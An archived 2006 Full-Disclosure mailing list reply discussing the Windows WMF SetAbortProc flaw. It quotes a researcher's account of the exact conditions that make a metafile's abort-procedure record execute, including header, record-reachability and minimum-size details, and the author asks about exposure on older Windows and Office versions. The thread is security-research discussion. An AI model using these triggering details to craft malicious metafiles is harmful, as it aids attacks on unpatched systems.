[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Steve Gibson smokes crack?

To: Peter Ferrie <pferrie@xxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Steve Gibson smokes crack?
From: eric williams <nfobro@xxxxxxxxx>
Date: Fri, 13 Jan 2006 23:36:43 +0000

On 1/13/06, Peter Ferrie <pferrie@xxxxxxxxxxxx> wrote:
> [snip]
> >does any know the circumstances, in all cases, where the bug is
> >triggered or is there only speculation based upon exploit code
> >"working" against a given vulnerable implementation of the API?
>
> The triggering mechanism is well-understood: this incorrect record
> length requirement is simply wrong.  There is no "magic key".
> It is possible to create entirely well-formed files that will
> execute.  I don't know why Steve couldn't get it working properly,
> and I'd like to know just how he managed to get it working at all
> on Windows 2000 (see below).  So, what we have is this:
>
> The file must not begin with the placeable (aka Aldus) meta file
> header.  If it does begin with that, then the function is ignored,
> and Windows continues to parse the file.
> This is why Windows 9x, NT, and 2000, do not execute anything from
> within Internet Explorer, for example - they do not support WMF
> files without the Aldus header.
>
> The record must be reachable.  It will not execute if the EOF
> record (function number 00) is seen first.
>

Ahh, perfect!  Thanks Peter that clears up a lot for me.  In fact does
this also infer that all you need is a "crapped" up pluggable viewer
for IE on Windows 9x, etc. to exploit this flaw on one of those O/Ss? 
Does this further indicate that Office 98 and other M$ Office versions
that run on the ealier O/Ss and support the WMF mapping are
'vulnerable' to exploitation - still ?

Thanks, you provided a cogent and direct response, it was very helpful
(at least to me) in getting to the meat of this dicussion.

-e

> That's all.  To clarify some other things:
>
> The record length can be any value at all, as long as it remains
> within the bounds of the file.  Before executing any record,
> Windows checks that the next record is accessible.
>
> The file does not have to end with the EOF record, but there must
> be one in the file.
>
> The smallest metafile is 18 bytes.  That's the header only.
> The smallest parsable metafile is 24 bytes (EOF record only).
> The smallest SetAbortProc file for Windows XP is 62 bytes.
>
> 8^) p.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- RE: [Full-disclosure] Steve Gibson smokes crack?
  - From: Peter Ferrie

References:
- [Full-disclosure] Steve Gibson smokes crack?
  - From: Morning Wood
- Re: [Full-disclosure] Steve Gibson smokes crack?
  - From: Randal L. Schwartz
- Re: [Full-disclosure] Steve Gibson smokes crack?
  - From: eric williams
- RE: [Full-disclosure] Steve Gibson smokes crack?
  - From: Peter Ferrie

Prev by Date: Re: [Full-disclosure] Re: [ GLSA 200601-09 ] Wine:Windows MetafileSETABORTPROC vulnerability
Next by Date: Re: [Full-disclosure] ntpd stack evasion exploit
Previous by thread: RE: [Full-disclosure] Steve Gibson smokes crack?
Next by thread: RE: [Full-disclosure] Steve Gibson smokes crack?
Index(es):
- Date
- Thread